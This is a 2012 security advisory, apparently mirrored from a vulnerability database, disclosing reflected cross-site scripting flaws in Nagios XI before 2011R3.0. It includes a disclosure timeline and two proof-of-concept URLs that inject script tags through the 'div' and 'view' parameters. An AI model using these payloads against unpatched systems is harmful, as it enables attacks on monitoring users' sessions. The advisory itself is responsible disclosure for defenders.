Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28177
HistoryJun 18, 2012 - 12:00 a.m.

0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

2012-06-1800:00:00
vulners.com
17

================
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:

Multiple reflected XSS vulnerabilities exist within Nagios XI < 2011R3.0

Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT

================
Timeline:

16 May 2012 - Reported to Nagios Enterprises
16 May 2012 - Acknowledged
16 May 2012 - Reported fixed
04 June 2012 - Nagios XI 2011R3.0 released
14 June 2012 - Public disclosure

================
Details:

Page: /includes/components/graphexplorer/visApi.php
POC: http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&amp;div=&lt;/script&gt;&lt;script&gt;alert&#40;&#39;0a29&#39;&#41;&lt;/script&gt;&amp;opt=topalerts

Page: /nagiosxi/perfgraphs/index.php
POC: http://site/nagiosxi/perfgraphs/index.php?view=&#39;&gt;&lt;script&gt;alert&#40;&#39;0a29&#39;&#41;&lt;/script&gt;&amp;start=&amp;end=&amp;startdate=&amp;enddate=